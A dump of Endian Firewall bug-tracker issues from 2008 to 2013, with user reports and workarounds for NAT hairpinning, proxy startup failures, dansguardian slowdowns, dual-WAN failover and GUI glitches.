well. the attempt to solve this issue with a non-stateful rule is definitively not solving the problem, since the target will answer with its own ip-address and will not translated back to the target ip address, because the answer does not pass the DNAT'ing device.

So the 2 possibilities to solve this is:

1) Configure your internal DNS (dns proxy) in order that access to the host which points to your external portforwarded ip will point to the green ip. So traffic will go directly to the target and do not pass the DNAT rule.

2) Create a matching SNAT rule for your DNAT rules in order that traffic coming from the same subnet as the DNAT target and going to the DNAT target, will be SNAT'ed to the firewall's ip address of the target subnet.
So answers will be forced to go back passing the firewall. However you will see connections coming always from your firewall instead of your internal ip.


example for 2:

DNAT rule:
portforward from 80.80.80.80:25 -> 192.168.0.10:25
firewall has ip: 192.168.0.1

SNAT rule:
source: 192.168.0.0/24
destination: 192.168.0.10
dest-port: 25
NAT to 192.168.0.1
(0006122)
icedburn   
2011-04-15 10:36   
Hai,
May i ask. Does this issue has any update. My client has the same problem and we are trying to solve their problem. We have try what peter gave, but still the problem arise.
Hope to hear from you guys.. thanks.
(0006966)
Dj_GL   
2011-07-12 18:53   
(edited on: 2011-07-12 18:54)
Instead of adding rules for every private IP I've added a single SNAT rule
source: 192.168.0.0/24
destination: 192.168.0.0/24
NAT to 192.168.0.1

That seems to work for me but does it maybe have some unwanted side-effects?






View Issue Details
4221 [Endian Firewall] Kernel block have not tried 2011-12-09 16:17 2013-02-21 04:52
ardit-endian  
 
normal  
confirmed 2.4.1  
open  
none    
none  
   
kernel : xt_TCPMSS: bad length (1024 bytes) + PATCH
Hi,

a customer with 500+ concurrent voip connection (a 16 cores workstation) saying that the firewall "crashed" due to heavy voip traffic.

When logged in this is what I recall interesting:
http://pastie.org/2991370 [^]

Leaving the other problems (already know what and why) and focusing to the kernel message I found that is related with netfilter, an the matching rule (MSS) is located in mangle, chain:

Chain FORWARD (policy ACCEPT 231M packets, 33G bytes)
 pkts bytes target prot opt in out source destination
1217K 66M TCPMSS tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x02 TCPMSS clamp to PMTU


http://rhkernel.org/#RHEL6+2.6.32-71.18.2.el6/net/netfilter/xt_TCPMSS.c [^]
  63 /* Since it passed flags test in tcp match, we know it is is
  64 not a fragment, and has data >= tcp header length. SYN
  65 packets should not contain data: if they did, then we risk
  66 running over MTU, sending Frag Needed and breaking things
  67 badly. --RR */
  68 if (tcplen != tcph->doff*4) {
  69 if (net_ratelimit())
  70 printk(KERN_ERR "xt_TCPMSS: bad length (%u bytes)\n",
  71 skb->len);
  72 return -1;
  73 }


So the error is caused for 2 reasons:

1) Syn packets which contains data (normally not allowed)
2) TCP header larger than the packet itself

It's rare to reproduce because on rare occasions is produced this kind of traffic, however there is already a patch on this problem (I belive it's included in the vanilla).

PATCH:

http://www.gossamer-threads.com/lists/linux/kernel/1180390?do=post_view_threaded [^]
log.txt (2,467) 2011-12-09 16:22
https://bugs.endian.com/file_download.php?file_id=895&type=bug
There are no notes attached to this issue.





View Issue Details
4531 [Endian Firewall] Proxy HTTP major always 2013-02-19 00:35 2013-02-19 00:50
Sheldmandu Any  
Any  
normal Any  
new 2.5  
open  
none    
none  
   
Policy Routing not working with HTTP Proxy turned on
Network Policy Routing does not work when HTTP Proxy is enabled and access is through the HTTP Proxy (only tested transparent proxy).
Setup 2 WAN (Red) interfaces.
Enable HTTP Proxy and set to transparent on Green.
Create a Policy Route to route HTTP traffic via the additional uplink (not the main one).
Go to whatismyip.com to see your IP address. It's still that of the main uplink.
Turn off the HTTP Proxy or change to non-transparent on Green.
Go to whatismyip.com to see your IP address. Notice that it is now of the additional uplink (as it should be).
Product version is 2.5.1
Notes
(0008380)
Sheldmandu   
2013-02-19 00:48   
Having done some further research I worked out the issue and arguably it's "by design". The Policy Routing takes place AFTER the HTTP Proxying and due to this you need to have the FROM set to LOCAL in your Policy Routing rule. The policy routing then works fine.

There is still a problem when you want for example to have everything from your DMZ Orange network going via a different uplink. There is no way to specify a Policy Routing rule to make everything from the DMZ go via a different uplink using Policy Routing if you're proxying the HTTP traffic from the DMZ. Perhaps this is more a documentation issue rather than anything else.
(0008381)
Sheldmandu   
2013-02-19 00:50   
This issue is effectively a duplicate of issue 4353 and issues 3305. Issue 3305 explains the solution.





View Issue Details
4530 [Endian Firewall] Network related (VPN, uplinks) crash always 2013-02-12 23:52 2013-02-13 00:11
mario79 Endian community  
 
high 2.5.1  
new 2.5  
open  
none    
none  
   
Dual wan fail...
Hi all.

I have a problem with dual wan.

I have 4 network interfaces:
eth0 - Green
eth1 - Orange
eth2 - Blue
eth3 - Red
eth5 - other

You configure the interfaces, which will eth5 main backup.

Disconnect the main interface, but does not activate the backup link.


Thank you.
Endian Community 2.5.1.
config gui.zip (189,559) 2013-02-12 23:52
https://bugs.endian.com/file_download.php?file_id=1041&type=bug
Notes
(0008370)
mario79   
2013-02-13 00:11   
Attach more information.

ping google.com -I eth5
PING google.com (190.212.166.24) from 165.98.68.227 eth5: 56(84) bytes of data.
From host227-68-98-165.movistar.com.ni (165.98.68.227) icmp_seq=0 Destination Host Unreachable
From host227-68-98-165.movistar.com.ni (165.98.68.227) icmp_seq=1 Destination Host Unreachable
From host227-68-98-165.movistar.com.ni (165.98.68.227) icmp_seq=2 Destination Host Unreachable
From host227-68-98-165.movistar.com.ni (165.98.68.227) icmp_seq=4 Destination Host Unreachable


root@srv:~ # ping google.com -I eth3
PING google.com (190.212.166.25) from 165.98.68.34 eth3: 56(84) bytes of data.
64 bytes from 25-166-212-190.enitel.net.ni (190.212.166.25): icmp_seq=0 ttl=57 time=2.07 ms
64 bytes from 25-166-212-190.enitel.net.ni (190.212.166.25): icmp_seq=1 ttl=57 time=1.72 ms
64 bytes from 25-166-212-190.enitel.net.ni (190.212.166.25): icmp_seq=2 ttl=57 time=1.73 ms
64 bytes from 25-166-212-190.enitel.net.ni (190.212.166.25): icmp_seq=3 ttl=57 time=1.69 ms

Sorry for my english, i use a translate tool.

Thanks.





View Issue Details
1266 [Endian Firewall] GUI feature always 2008-08-09 06:17 2013-02-09 22:53
kfason  
 
normal  
new 2.2-rc2  
open  
none    
none  
   
Add OpenDNS support
OpenDNS is a great service that should be included in EFW. Some ideas I have are in System | Network Configuration | DNS page. In addition to auto or manual, add checkbox to use OpenDNS servers. Maybe include ability of sort order. i.e. use OpenDNS first, then the DNS servers provided by DHCP on red or vise versa.

The other place would be under Services | Dynamic DNS. If a DDNS is setup, have a checkbox to also update the OpenDNS service for the additional stuff such as stats.
http://www.opendns.com [^]
Notes
(0001522)
leward   
2008-08-12 02:41   
OpenDNS is supported as with any DNS service you want to use. To set the DNS you need to go to the System tab in the GUI and click Network Configuration. When you get to step 4 you need to change the DNS radio button to "manual" and then when you click next to Step 5 it will ask you what the IP addresses are for the Pri/Sec name servers, this is where you put in the OpenDNS addresses.

Hope this helps.
(0001523)
kfason   
2008-08-13 00:45   
correct and that is what I've done. I'm asking that the OpenDNS servers be a checkbox option. Also requesting that EFW register the IP as it does with a DDNS service.
(0008369)
cmateski   
2013-02-09 22:44   
It would also be nice to add the login account information to take advantage of the additional features the service offers.

This issue is over four years old. Did it get resolved in another ticket or is it on the roadmap? Please advise.





View Issue Details
4307 [Endian Firewall] GUI tweak always 2012-03-28 13:37 2013-02-07 17:25
baldy  
davide-endian  
normal  
feedback 2.5  
reopened  
none    
none  
   
Time value for Uptime is not displayed correctly
On the Dashboard the system uptime is shown incorrect.

The value for hours is the total amount of hours the system is up and running, not the value that should be shown when the days are subtracted.
In the attached picture the system uptime is shown as

32 days 790 hours and 46 minutes

Correct calculation would be 32 days 21 hours and 46 minutes
GUI Time.jpg (5,725) 2012-03-28 13:37
https://bugs.endian.com/file_download.php?file_id=922&type=bug
Notes
(0007816)
davide-endian   
2012-04-05 12:21   
Fixed in efw-dashboard 2.9.2
(0008367)
Sota   
2013-02-07 17:24   
I'm running EFW 2.5.1 with efw-dashboard 2.7.10-0, how do I get efw-dashboard 2.9.2? I've tried running efw-upgrade but it just says "no interesting upgrades available"

Thanks.





View Issue Details
3746 [Endian Firewall] GUI minor always 2011-05-16 23:13 2013-02-03 01:59
gmar_87  
 
normal  
new 2.4.1  
open  
none    
none  
   
Traffic graphs limited to 1.2 MBps
Traffic graphs do not show speeds greater than 1.2 MBps.
When traffic exceeds 1.2 MBps the graph is not plotted (see screenshot attached).
I was downloading at 4MBps to test this and the outgoing line (blue) disappeared from the graph.
This happens on 2.3, 2.4 and 2.4.1 installations.
We have a 40Mbps/40Mbps connection and would like to correct graphical representation.
Endian2-4-1_TrafficGraphs.jpg (56,476) 2011-05-16 23:13
https://bugs.endian.com/file_download.php?file_id=719&type=bug
Notes
(0008365)
gmar_87   
2013-02-03 01:47   
Decided to re-visit this and found the issue :)

There is a hard-coded limit for traffic RRD's in /usr/local/bin/makegraphs.pl
I have change this limit from 1.25Mbps to 1Gbps and confirmed traffic graphs now display correctly.

The following steps change traffic graph limits to 1Gbps and reset the graphs (old data no longer shown).

1. Open /usr/local/bin/makegraphs.pl
2. Locate "sub updateifdata" function
3. Replace:
"DS:incoming:ABSOLUTE:600:0:1250000",
"DS:outgoing:ABSOLUTE:600:0:1250000",

with

"DS:incoming:ABSOLUTE:600:0:1000000000",
"DS:outgoing:ABSOLUTE:600:0:1000000000",

4. Delete or rename existing traffic RRD's in /var/log/rrd (eg. RED.rrd, GREEN.rrd)
5. Execute /usr/local/bin/makegraphs.pl
6. Browse to traffic graphs in EFW web interface and confirm traffic graphs have been reset. You may need to clear your browser cache or press Ctrl+F5
7. Simulate traffic by transferring a large file from yout LAN to your EFW box via SCP and check graphs.
(0008366)
gmar_87   
2013-02-03 01:59   
BTW, can you please release this patch as the issue still exists in 2.5.1





View Issue Details
4524 [Endian Firewall] Endian Firewall minor N/A 2013-01-31 01:15 2013-01-31 01:15
pcphilippe1  
 
normal  
new 2.2  
open  
none    
none  
   
Unable to to upgrade
Hello every time I run the Smart upgrade command I get this conflict

error: file /home/httpd/html/include/servicesubscriber.js from install of efw-guilib-2.4.3-0.endian5 conflicts with file from package efw-base-2.6.127.2-1.endian9
There are no notes attached to this issue.





View Issue Details
4523 [Endian Firewall] Documentation minor always 2013-01-30 20:01 2013-01-30 20:01
yhenao endian  
2.5  
normal 2.5  
new 2.5  
open  
none    
none  
   
There is not dashboard.cgi
Hello I have found the dashboard.cgi but it is not possible. Before i had on /home/httpd/cgi-bin a dashboard.cgi file, bit dont now.

I have seen a /manage/dashboard on my web browser, but i can not find it.

Could you say me where is it?

Best regards,

Yanmidt
There are no notes attached to this issue.





View Issue Details
4522 [Endian Firewall] GUI minor N/A 2013-01-13 03:52 2013-01-13 03:52
marioeirea  
 
normal  
new 2.5  
open  
none    
none  
   
Ability to allow and deny specific URLs from GUI
Would be nice if the GUI was extended to allow modification of exceptionurllist and bannedurllist from content filter profile editor.
There are no notes attached to this issue.





View Issue Details
4521 [Endian Firewall] Other Services minor always 2013-01-10 20:00 2013-01-10 20:00
danw-rite  
 
high  
new 2.5  
open  
none    
none  
   
Traffic Monitoring
When I turn on traffic monitoring and then click on the the administrative interface and try to browse to it, I never make it there. The error is that the page is not available.
I go to services and then traffic monitoring, enable traffic monitoring and then click on the link to the administrative interface. The web page then errors out.
There are no notes attached to this issue.





View Issue Details
3853 [Endian Firewall] Proxy HTTP major always 2011-06-03 12:10 2012-12-24 16:32
datapharmer  
lorenzo-endian  
normal  
feedback 2.4.1  
open  
none    
none  
   
transparent proxy does not start properly at boot
I am running endian 2.4.1 community edition (2.6.32.25-57.e40.i586) on a dell poweredge 1850. The proxy is configured to be transparent with havp and dansguardian, squid and content filtering enabled. When booting, no users can access the internet, there are no messages or responses to the browser, it is as if the proxy is not running at all, but internal systems that are set to bypass the transparent proxy can get to the internet just fine. Switching the proxy to be non-transparent, turning it off, back on, and then switching to transparent resolves the issue, but this is a pretty big problem if there isn't someone there to perform this from the GUI.
The problem also sometimes occurs if there are changes made to the proxy settings that cause it to need to restart, repeating the same process of switching to non-transparent, stopping, starting, and switching back to transparent seems to work in this situation as well.
Notes
(0006867)
datapharmer   
2011-06-30 18:17   
Had to shut down and later cold boot due to a power issue, and confirmed that this bug is repeatable... a simple acknowledgment of this problem would be appreciated. It is very disconcerting knowing that internet will be down for the entire building if things get rebooted unless someone logs in and manually toggles a switch.
(0006875)
datapharmer   
2011-07-01 15:32   
For anyone else that runs into this:
symptoms: squid (web proxy), havp (anti-virus), and dansguardian (content filter) do not start at boot. Switching proxy from transparent to non-transparent and switching back starts the services.
Fix: make havp chkconfig aware, copy havp.conf to havp.config, test that both services start manually from the commandline. make sure squid ports are explicitly allowed from green interface in system access firewall, make sure squid starts from the commandline. Reboot, confirm it works now.
(0006893)
lorenzo-endian   
2011-07-06 12:37   
Hi datapharmer,

could I ask to you if there is any error in the logs?

Thanks in advance!

Lo





View Issue Details
4452 [Endian Firewall] Other Services major always 2012-09-25 08:53 2012-12-24 16:29
luke-endian  
 
normal  
new 2.5  
open  
none    
none  
   
monit does not restart dansguardian correctly
Hi guys
if you restart dansguardian using "monit restart dansguardian", this procedure fails
8/10 times. The same problem occur if you change the content filter confguration from gui and then press apply button,when jobsengine tells to monit to restart the service you can see that 9999 port is used by dansguardian and if you run "ps aux |grep dansguardian" you can see the dansguardian processes,but in /var/run the dansguardian.pid file is empty!
Monit checks that file to verify if dansguardian is running or not and if that file is empty monit thinks that the process is dead and runs only the start process and not the stop,so until you don't kill all the DansGuardian processes and delete /var/run/dansguardian.pid file, monit is unable to start dansguardian service.This problem occur on 2.5 macro and 2.5 intel
monit_dg (4,505) 2012-09-25 08:54
https://bugs.endian.com/file_download.php?file_id=989&type=bug
Notes
(0008197)
luke-endian   
2012-09-25 08:56   
We've found a workaround:
in /etc/monit.d/dansguardian.conf
change the start parameter with:
 start program = "/bin/bash -c 'rm /var/run/dansguardian.pid; killall -9 dansguardian; /etc/init.d/dansguardian start'"
(0008354)
daniele-endian   
2012-12-18 15:37   
this is became a major issue





View Issue Details
4520 [Endian Firewall] Endian Firewall minor have not tried 2012-12-19 09:44 2012-12-19 09:51
rvc.rajkumar  
 
normal  
new 2.5  
open  
none    
none  
   
Want To Allow External SqlServer
I want my firewall to allow all internal ip(192.168.2.---)
to access the sql server outside the firewall diffrent ip(**.**.***.*9)
There are no notes attached to this issue.





View Issue Details
4519 [Endian Firewall] Log and Statistics crash have not tried 2012-12-17 14:06 2012-12-17 14:06
mario79 Endian community  
 
urgent 2.5.1  
new 2.5  
open  
none    
none  
   
full /var/log/
Good day.

I have problem with internet, with the proxy users, then, i watch on Dashboard, that the partition /var/log/ is full. For resolved this problem, disable proxy.

How to delete the logs?, What is the path?

May i change the partition /var/log in other partition /var/log2? ¿how to?

Thanks, and sorry for my english.
There are no notes attached to this issue.





View Issue Details
4518 [Endian Firewall] Intrusion Prevention minor always 2012-12-17 07:32 2012-12-17 07:32
simontkksimontkk  
 
normal  
new 2.5  
open  
none    
none  
   
Intrusion prevention system not able to generate log./ no live log
Version:2.5.1

Dear All,

First:
Currently i faced a problems that ,my live log for Instruction prevention is not coming out although i have already activate Instruction prevention system under "services"?
Can anyone guide me, where show i activate this feature?

Second:
Previosly, i also faced a problems on no log generate for firewall. The firewall log will only come out after i restart the firewall again.

There are no notes attached to this issue.





View Issue Details
4470 [Endian Firewall] Network related (VPN, uplinks) minor always 2012-10-19 10:03 2012-12-04 04:27
mhLearn  
 
normal  
new 2.5  
open  
none    
none  
   
Inter-zone Traffic And Policy Routing Issue
Hi,

Not sure if this is a bug or it was supposed the way on version 2.5.1.

Traffic from Orange zone to Green zone on open ports was failed when Policy Routing was applied to Orange zone too.

By just setting up a rule on Inter-zone Traffic, where
            Orange -> Green, <ports>
the traffic would be dropped, as logged in firewall log as "ZoneFW.Drop"

To solve this, do following,

1. Setup Static Routing, and enable it
      Source Network: <Orange Zone Net IP/CIDR>
      Destination Network: <Green Zone Net IP/CIDR>
      Route Via -> Static IP : <Green Zone Gateway IP>

2. Setup Inter-zone Traffic, and enable it
      Orange -> Green, <ports>

3. Apply the Policy Routing that you want

Doesn't matter of the steps sequence, once all setup properly, it would work.

 
In my case, Endian Firewall was setup with BLUE, ORANGE and GREEN Zones.

The Policy Routing was setup to divert all traffic from ORANGE and BLUE zone to use 2nd uplink connection, where GREEN zone was using main uplink card.
There are no notes attached to this issue.





View Issue Details
4390 [Endian Firewall] Network related (VPN, uplinks) crash have not tried 2012-07-05 14:58 2012-12-04 04:25
mhLearn  
lorenzo-endian  
normal  
feedback 2.5  
open  
none    
none  
   
PPPoE Connection Failed
After reboot the system few times within hour through the webgui, the pppoe connection was connected for 0.2 minutes, and then disconnected. This kept repeating.
EFW 2.5.1
EFW_PPPoE_Crashed.txt (13,035) 2012-07-05 14:58
https://bugs.endian.com/file_download.php?file_id=962&type=bug
Notes
(0007939)
mhLearn   
2012-07-06 05:07   
Prior before the crash,
1. Tried to setup backup uplink which have same DNS with main uplink. Reboot system. Backup uplink failed to make connection.
2. Then tried with different connection type, Ehternet Static, PPPT, Ethernet DHCP, and also different NICs for backup uplink. Reboot system. Backup uplink failed to connect.
3. Removed backup uplink setup through webgui and reboot system.

Thereafter, the main uplink PPPoE problem start.

Other details,
Motherboard : Asus P3V133
RAM: 640MB
NIC: 4 units
(0007940)
mhLearn   
2012-07-06 05:22   
Possible issue link to reported case 0002526
(0007944)
lorenzo-endian   
2012-07-06 13:12   
Hi mhLearn,

do you have the chance to test the system with a pppoe concentrator attached on the uplink?

here you can find a guide to install a pppoe concentrator: http://www.lo-online.net/cs/install-pppoe-concentrator-on-ubuntu-server-11-10.html [^]

bye!

Lo
(0007995)
mhLearn   
2012-08-08 05:32   
Will have a look in it and update here. thx
(0008063)
lorenzo-endian   
2012-09-04 09:34   
hi mhLearn,

the guide has been moved there: http://hidden-bits.com/?p=19 [^]

bye!

Lo
(0008241)
mhLearn   
2012-10-19 09:27   
Hi lorenzo,

thank for you suggestion. The download link in the page doesn't work.

Anywhere, the 2nd uplink has been setup as Ethernet Static card to avoid the possible issue, i.e.
    1. Main uplink connection is controlled and initiated by Endian Firewall, and
    2. 2nd uplink connection is controlled and initiated by modem.

thx





View Issue Details
4514 [Endian Firewall] Endian Firewall feature N/A 2012-12-04 03:59 2012-12-04 04:25
mhLearn  
 
normal  
new 2.5  
open  
none    
none  
   
Blocking Unknown MAC With Static IP
Hi,

Just finding a way to block any unknown device configured with static IP and got connected to internet, either via wireless or wired.

Currently, even enabled "Allow Only Fixed Leases" on DHCP setup, if a device was set with static IP, it still able get internet access or access other same zone computers.

Is that any where to block it? Thanks
There are no notes attached to this issue.





View Issue Details
4478 [Endian Firewall] Endian Firewall major always 2012-11-01 19:34 2012-12-03 17:40
Tecnic  
 
normal  
new 2.5  
open  
none    
none  
   
Endian Firewall Issues on VPN traffic
The Endian Firewall 2.5.1 "VPN Traffic" with this problem in establishing safety rules.
Rules created based on the source MAC, IP and User Open VPN does not work. Only works when used and the Origin and <any> Zone / Interface, in these two cases and can gain access.
There are no notes attached to this issue.





View Issue Details
4454 [Endian Firewall] Hotspot minor always 2012-09-26 14:51 2012-11-29 16:50
thomas-endian  
 
normal  
new 2.5  
reopened  
none    
none  
   
corrupt Next Button self-service report gui
Button “Next” under
Hotspot > Reports > SmartConnect Transactions
is corrupt, he create the following error (message in the GUI: Not found):
Sep 26 16:02:56 ENDIAN-EE emi[5533]: _cp_on_http_error status: 404 message: The path '/manage/hotspotgui/selfservice/count-1 >= offset + offset_step' was not found. request_path: /manage/hotspotgui/selfservice/count-1 >= offset + offset_step handler: None
Any other buttons works…

Maybe the line 86 under
/usr/lib/python2.4/site-packages/endian/hotspotgui/web/templates/selfservice_list.mak
is not correct:
% if (count - 1) >= (offset + offset_step):
                    count-1 >= offset + offset_step
Notes
(0008201)
Anonymous   
2012-09-27 15:25   
(edited on: 2012-09-27 15:28)
htpasswd -m /var/efw/auth/users admin

(0008203)
luca-endian   
2012-09-28 07:58   
hi thomas,

could you add more details? A screenshot, I don't get exactly the point of this bug.

Thanks
(0008204)
thomas-endian   
2012-09-28 08:24   
hi luca,
please have a look in the zendesk ticket 2850, you can find a short MPEG movie in the first line/comment from the customer (4 MB file, therefore over this way). You can also find the access parameter in zendes comment from 25. September 2012 15:25
(0008209)
daniele-endian   
2012-09-28 15:02   
Video of the issue uploaded on my dropbox:
https://dl.dropbox.com/u/67957000/Error.mpeg [^]
(0008250)
thomas-endian   
2012-10-25 14:18   
any news?
(0008292)
daniele-endian   
2012-11-13 11:50   
FIX/Workaround

Edit the file
/usr/lib/python2.4/site-packages/endian/hotspotgui/web/templates/selfservice_list.mak

When you found this line:
count-1 >= offset + offset_step
As you can see there is a double "href" remove "href="count-1 >= offset + offset_step"" and save the file.





View Issue Details
4511 [Endian Firewall] Log and Statistics major always 2012-11-28 07:02 2012-11-28 07:02
goreXP  
 
urgent  
new 2.5  
open  
none    
none  
   
Cannot access HTTP and Content filter logs
When I access these "Proxy" from "Logs" menu:

Logs --> Proxy --> HTTP
Logs --> Proxy --> Content filter

I get a STOP sign img and "The Endian Management Interface encountered an error. Please contact an administrator." message.
http_proxy_log_viewer.png (58,387) 2012-11-28 07:02
https://bugs.endian.com/file_download.php?file_id=1034&type=bug
There are no notes attached to this issue.





View Issue Details
4508 [Endian Firewall] Hardware related (kernel, drivers, hardware) feature have not tried 2012-11-25 16:57 2012-11-25 16:57
bogdan1 ARM  
 
normal  
new 2.5  
open  
none    
none  
   
2.5.1 ARM
Hello

My question is,
Is it possible to run EFW community on ARM (raspberry Pi ).

Best regards



There are no notes attached to this issue.





View Issue Details
4350 [Endian Firewall] Uncategorized major random 2012-05-07 13:41 2012-11-22 20:43
marioeirea  
 
normal  
new  
open  
none    
none  
   
Dansguardian filtering slows pages loads
After operating for a while, dansguardian will slow filtered pages down to a crawl. Issuing the command "/etc/init.d/dansguardian restart" temporarily fixes the problem. This does not affect people on the allow list in the access policies which means this is a dansguardian problem. This is affecting clients on 2.5.1 and was not an issue in 2.4.1.
Notes
(0007862)
victorhugops   
2012-05-10 16:33   
Hi,

here we have the same problem !!!
at the dashboard the HTTP Proxy status is off !!!
(0007863)
juankamilo   
2012-05-10 21:44   
Hi,

I have the same problem
do not know if this has to do but, i found these errors in /var/log/httpd/error_log

Use of uninitialized value in substitution (s///) at /home/httpd/html/proxy.pac line 287.
Use of uninitialized value in substitution (s///) at /home/httpd/html/proxy.pac line 163.
Use of uninitialized value in substitution (s///) at /home/httpd/html/proxy.pac line 160.
Use of uninitialized value in substitution (s///) at /home/httpd/html/proxy.pac line 163.
(0007865)
victorhugops   
2012-05-11 20:17   
Hello again,

the problem is recurrent !!! now, we need restart the dansguardian time-to-time..

the last time, I see many TIME_WAIT connections in the port 3128 (squid), 8080(squid??) and 9998 (havp)


=====================================
# netstat -putan | egrep '(8080)' | wc -l
    667
# netstat -putan | egrep '(3128)' | wc -l
    213
# netstat -putan | egrep '(999)' | wc -l
   1331
# netstat -putan | grep TIME_WAIT | egrep '(8080)' | wc -l
    589
# netstat -putan | grep TIME_WAIT | egrep '(3128)' | wc -l
    103
# netstat -putan | grep TIME_WAIT | egrep '(999)' | wc -l
   1165
=====================================

the log files don't show any thinks...
any services "work" checkink in the SO

=====================================
# /etc/init.d/dansguardian status
Parent DansGuardian pid:3696
# /etc/init.d/squid status
squid (pid 7194 7192) is running...
# /etc/init.d/havp status
havp (pid 2666 2665 2664 2663 2662 2661 2660 2659 2658 2657 2656 2654 2653 2652 2651 2650 2649 2648 2647 2646 2645 2644 2643 2642 2641 2640 2639 2638 2637 2636 2635 2634 2633 2632 2631 2630 2629 2628 2627 2626 2624) is running...
# /etc/init.d/clamd status
clamd (pid 7180) is running...
=====================================

maybe the port where the proxy work (3128) is not a default ???
I believe that the problem is with antivir, but I can't found it (yet).

mmmm... that is bad !! :-(
(0007871)
marioeirea   
2012-05-16 06:21   
Setting the following values in /etc/dansguardian/dansguardian.conf fixed it for me:

maxchildren = 400
minchildren = 32
minsparechildren = 15
preforkchildren = 8
maxsparechildren = 64
maxagechildren = 4000

Looks like these values where changed from 2.5 going forward, severely reduces the number of connections that can be open at the same time. Change it in the tmpl file if you want the values to stick.
(0007875)
victorhugops   
2012-05-26 18:08   
Hi,

that is interesting too
http://bugs.endian.com/view.php?id=3432 [^]

In my case, when the user visit a streaming site..
the havp take many time (and all threads) to process each one of that connections.

:-(
(0007923)
anand_apscan   
2012-06-20 07:32   
Hi,

I am using endian for the first time, i dont have much idea abt endian,
someone please help me how to edit $MAXCHILDREN value in /etc/dansguardian/dansguardian.conf.tmpl file.

maxchildren = $MAXCHILDREN
minchildren = $MINCHILDREN
minsparechildren = $MINSPARECHILDREN
preforkchildren = $PREFORKCHILDREN
maxsparechildren = $MAXSPARECHILDREN
maxagechildren = $MAXAGECHILDREN
(0008022)
fqureshi   
2012-08-27 02:02   
@ anand_apscan

You can do the following:

nano /usr/lib/efw/dansguardian/default/settings
change the values as below:

MAXCHILDREN=500
MINCHILDREN=128
MINSPARECHILDREN=32
PREFORKCHILDREN=16
MAXSPARECHILDREN=256
MAXAGECHILDREN=10000


Also if you are facing slow browsing issue change the following values:

nano /var/efw/havp/settings

change 2 values as below

MAXSERVERS=150
SERVERNUMBER=50
(0008331)
ipanema211   
2012-11-22 20:43   
I have reason to believe it has something to do with havp

/var/efw/havp/settings does not exists on my 2.5.1 and creating it does not solve the problem. Changing the dansguardian settings to above didn't do the trick for me neither.
Disabling anti virus on all content filter profiles solved the performance issue




View Issue Details
4500 [Endian Firewall] Proxy - STMP minor always 2012-11-15 13:46 2012-11-15 16:13
baldy  
 
normal  
new 2.5  
open  
none    
none  
   
DNSBL provider dsn.rfc-ignorant.org will be shutdown completely bij november 30th
dsn.rfc-ignorant.org will be shutdown completely by the end of the month.
http://rfc-ignorant.org/endofanera.php [^]

Currently a lot of mail is already blocked due to the RBL being unable to resolve the a records for the sending mailserver.

No workaround, to fix the RBL must be disabled and with a future update removed from the GUI altogether.
Nov 15 14:12:11 postfix/smtpd[13660]: NOQUEUE: reject: RCPT from smtp-vbr14.xs4all.nl[194.109.24.34]: 450 4.1.1 : Recipient address rejected: undeliverable address: host 192.168.1.1[192.168.1.1] said: 550 5.1.1 User unknown (in reply to RCPT TO command); from= to= proto=ESMTP helo=

Nov 15 14:12:11 postfix/smtpd[14347]: connect from smtp-vbr14.xs4all.nl[194.109.24.34]

Nov 15 14:12:11 postfix/smtpd[14347]: warning: smtp-vbr14.xs4all.nl.dsn.rfc-ignorant.org: RBL lookup error: Host or domain name not found. Name service error for name=smtp-vbr14.xs4all.nl.dsn.rfc-ignorant.org type=A: Host not